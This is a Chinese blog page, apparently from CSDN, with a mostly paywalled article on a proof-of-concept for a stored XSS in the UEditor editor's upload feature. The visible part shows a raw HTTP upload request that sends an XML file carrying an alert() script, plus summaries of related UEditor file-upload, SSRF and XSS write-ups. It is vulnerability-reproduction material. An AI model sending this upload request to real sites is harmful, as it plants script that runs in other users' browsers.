UEditor上传导致 XSS漏洞自动化实现POC_基于POCsuite3

最新推荐文章于 2025-02-22 17:06:51 发布
最新推荐文章于 2025-02-22 17:06:51 发布
阅读量823 收藏
点赞数
分类专栏: # 漏洞复现 网络安全&云安全 文章标签: xss 自动化 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_41490561/article/details/125826586
版权
本文详细介绍了如何利用POCsuite3自动化实现UEditor的XSS漏洞攻击,包括PHP和JSP版本的POC,重点讲解了POCsuite3中attack和verify模式的区别及应用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

1.PHP版本POC

2.JSP版本POCsuite POC

3.POCsuite3 POC

                                    

1.PHP版本POC

POST /ueditor/php/controller.php?action=uploadfile HTTP/1.1
Host: xxx.com
Cookie: xxxx(有的在前台,有的在后台)
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryL5aisVg49ZFuYNhc
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
Content-Length: 324

------WebKitFormBoundaryL5aisVg49ZFuYNhc
Content-Disposition: form-data; name="upfile"; filename="xss.xml"
Content-Type: image/png

<html><head></head><body><something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(`afei_come`);</something
了解本专栏 订阅专栏 解锁全文 超级会员免费看
UEditor上传导致 XSS漏洞复现
afei001
07-16 2819
UEditor是由百度「FEX前端研发团队」开发的所见即所得富文本web编辑器,具有轻量,可定制,注重用户体验等特点,开源基于MIT协议,允许自由使用和修改代码。UEditorv1.4.3.3中存在跨站脚本(XSS漏洞。...
老项目之UEditor漏洞问题
Mr.小灰狼_随笔
07-16 4514
老项目之UEditor漏洞问题 目录 1、文件上传漏洞 2、SSRF 漏洞 3、Upload XSS ueidtor 安全漏洞 _ UEditor SSRF 漏洞 ( JSP 版本 ) 分析与复现 1、项目所使用的 UEditor 组件存在 ssrf 漏洞 风险级别 : 低风险 风险分析 : 可通过此漏洞探测内容 ,甚至服务器权限...
技术分享-ueditor漏洞利用&源码分析超详细分析 (2)
最新发布
logic1001的博客
02-22 886
ueditor漏洞主要存在于其上传功能中,攻击者可以利用上传漏洞将恶意脚本上传到服务器,从而获取服务器的控制权或者进行其他恶意行为。攻击者一般通过修改上传文件的后缀名或者修改文件内容的方式来绕过服务器的安全检测。ueditor上传功能在其server下的文件Uploader.cs中实现。Uploader.cs中主要实现了文件上传的功能,并且包含了一些安全检测的代码。其中,一个重要的安全检测就是检测上传文件的后缀名是否在指定的白名单之内。
挖洞经验|UEditor编辑器存储型XSS漏洞
MachineGunJoe666
05-29 4554
前言 UEditor是由百度web前端研发部开发的所见即所得富文本web编辑器,具有轻量,可定制,注重用户体验等特点。UEditor存在一个XSS漏洞,编辑器在定义过滤规则的时候不严和读取内容的时候的绕过导致了该漏洞,此漏洞已经上报,由于技术略菜,有分析不到位的还请多多见谅。 漏洞成因分析 漏洞文件产生在前端配置文件ueditor.config.js: 以下为纯文本粘贴为true时的过滤规则,对一些危险的标签没有做过滤,怪不得好多二次开发的。 //纯文本粘贴模式下的过滤规则 //'filterT
Ueditor的XML文件上传导致存储型XSS(可以再试试xxe)和ssrf漏洞
weixin_50464560的博客
05-16 9319
UEditor 富文本web编辑器最新漏洞版XML文件上传导致存储型XSS - 『原创发布区』 - 大神论坛 |脱壳破解|易语言|病毒分析|www.dslt.tech 一、Ueditor最新版XML文件上传导致存储型XSS 测试版本:php版v1.4.3.3 下载地址:https://github.com/fex-team/ueditor复现步骤: 1.上传一个图片文件 2.然后buprsuit抓包拦截 3.将uploadimage类型改为uploadfile,并修改文件后...
百度html编辑器 xss,百度ueditor编辑器-xss漏洞
weixin_33871933的博客
06-25 1195
百度ueditor编辑器 xss漏洞一、漏洞简介产品官网下载地址:涉及版本:php , asp, jsp, net二、漏洞影响三、复现过程漏洞分析存在漏洞的文件:/php/getContent.php/asp/getContent.asp/jsp/getContent.jsp/net/getContent.ashx/php/getContent.php入进行了过滤,但是在14行输出时却使用了htm...
ueditor php 漏洞_XSS漏洞学习(一)Payload总结
weixin_39731271的博客
11-25 887
总结到最后还是有点乱, 将就看吧, 呜呜呜~有错误还请指出.基础知识弹窗的三个函数alert(7)prompt(7)confirm(7)on事件这里太多了, 没必要列完, 真用到其他事件时百度即可.onerror 错误onload 加载onclick 点击onchange 域的内容被改变onblur 元素失去焦点onfocus 元素获得焦点onmouseover 鼠标移...
大神论坛 UEditor 富文本web编辑器最新漏洞版XML文件上传导致存储型XSS
xiaotuge_always的博客
06-19 2046
一、Ueditor最新版XML文件上传导致存储型XSS 测试版本:php版 v1.4.3.3 下载地址:https://github.com/fex-team/ueditor 复现步骤: 1. 上传一个图片文件 2. 然后buprsuit抓包拦截 3.将uploadimage类型改为uploadfile,并修改文件后缀名为xml,最后复制上xml代码即可 4. 即可弹出xss 请注意http://controller.xxx的访问路径 http://192.168.10.1/ueditor1433/
实战 UEditor 任意文件上传漏洞
sweelg的博客
09-08 1957
漏洞影响UEditor的.Net版本,其它语言版本暂时未受影响 影响版本 1.4.3.3 .NET。
UEditor漏洞
2ed
07-29 1万+
UEditor是由百度开发的开源富文本编辑器,开源基于BSD协议,小巧灵活,使用简单,有很多web程序在使用UEditor编辑器。该任意文件上传漏洞存在于1.4.3.3和1.5.0版本中,并且只有.NET版本受该漏洞影响。黑客可以利用该漏洞上传木马文件,执行命令控制服务器。
2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享!
记录开发和安全学习过程中的点点滴滴
04-22 2854
也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.
UEditor 任意文件上传漏洞
zkaqlaoniao的博客
04-09 4879
前段时间在做某政府单位的项目的时候发现存在该漏洞,虽然是一个老洞,但这也是容易被忽视,且能快速拿到shell的漏洞,在利用方式上有一些不一样的心得,希望能帮助到一些还不太了解的小伙伴,故此写了此篇文章。Ueditor是百度开发的一个网站编辑器,目前已经不对其进行后续开发和更新,该漏洞只存在于该编辑器的.net版本。其他的php,jsp,asp版本不受此UEditor漏洞的影响,.net存在任意文件上传,绕过文件格式的限制,在获取远程资源的时候并没有对远程文件的格式进行严格的过滤与判断。
ueditor编辑器php漏洞,关于编辑器:UEditor编辑器任意文件上传漏洞分析
weixin_31750655的博客
04-04 710
ue下载地址http://http://ueditor.baidu.com/website/download.htmlexpshell addr:咱们首先来看一下目录构造ue是一个典型的net webbin目录和app_code目录其中bin上面援用的是jsondll 因而这里咱们不剖析dll次要还是看app_code目录上面的cs文件 首先轻易跟进一个办法看看有没有任意文件上传的可能性首先看到u...
实战纪实 | 编辑器漏洞Ueditor-任意文件上传漏洞 (老洞新谈)
热门推荐
zkaqlaoniao的博客
04-12 1万+
前段时间在做某政府单位的项目的时候发现存在该漏洞,虽然是一个老洞,但这也是容易被忽视,且能快速拿到shell的漏洞,在利用方式上有一些不一样的心得,希望能帮助到一些还不太了解的小伙伴,故此写了此篇文章。Ueditor是百度开发的一个网站编辑器,目前已经不对其进行后续开发和更新,该漏洞只存在于该编辑器的.net版本。其他的php,jsp,asp版本不受此UEditor漏洞的影响,.net存在任意文件上传,绕过文件格式的限制,在获取远程资源的时候并没有对远程文件的格式进行严格的过滤与判断。
html标签%3cp%3e,大神论坛 UEditor 富文本web编辑器最新漏洞 XML文件上传导致存储型XSS...
weixin_29421565的博客
06-22 1462
大神论坛 UEditor 富文本web编辑器最新漏洞 XML文件上传导致存储型XSS原创159768610802021-06-19 15:42:59©著作权©著作权归作者所有:来自51CTO博客作者15976861080的原创作品,如需转载,请注明出处,否则将追究法律责任https://blog.51cto.com/u_11440330/2927412## **一、Ueditor最新版XML文件上...
UEditor v1.4.3.3 .net版本任意文件上传 漏洞复现
Boom!脑洞大爆炸的博客
07-07 8454
UEditor v1.4.3.3 .net版本任意文件上传 漏洞复现
ueditor漏洞php如何解决,玩UEditor的几个让人蛋疼的问题、、、、 教你玩转PHP
weixin_34668147的博客
03-28 647
首先UEditor1.4.3以上版本将不再承诺支持ie6/7、所以一个网站还是抛弃这两个浏览器版本的兼容问题吧、、你可以用前一个版本的、如果你的页面代码是UTF8的那么恭喜、你可以完美滴用随便用、直接用官网的js地址都是可以的如果你的页面编码是GBK、那么恭喜你、杯具了、不要在意编辑器还提供的GBK版本、我不会告诉你那压根没法用、、因为有BUG首先你会遇到这么几个特蛋疼的问题、一是样式加载不了、特...
ueditor php 漏洞_【奇思淫技】TP5最新getshell漏洞
weixin_39801714的博客
11-25 3072
ThinkPHP 是一个快速、简单的基于 MVC 和面向对象的轻量级 PHP 开发框架,遵循 Apache2 开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重开发体验和易用性,为 WEB 应用和 API 开发提供了强有力的支持。0X00 基本环境确定目标存在tp5的漏洞,经过后期的探测发现安装有宝塔WAF。基本环境为:p...
ueditor 漏洞 php_【组件攻击链】ThinkCMF 高危漏洞分析与利用
weixin_39641103的博客
11-21 775
ThinkCMF 高危漏洞分析与利用一、组件介绍1.1 基本信息ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,该系统的用户无需关心开发SNS应用是如何工作的,但他们之间又可通过...
ueditor1_4_3跨平台资源包免费下载
与许多其它的编辑器不同的是,Ueditor提供了一个比较小巧的安装包,它强调轻量化,同时提供了高度的定制性,用户可以根据自身需要选择所需功能进行加载。 2. **版本特性:** 在本例中,我们关注的是1.4.3版本的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

afei00123

您的支持是我创作最大的动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值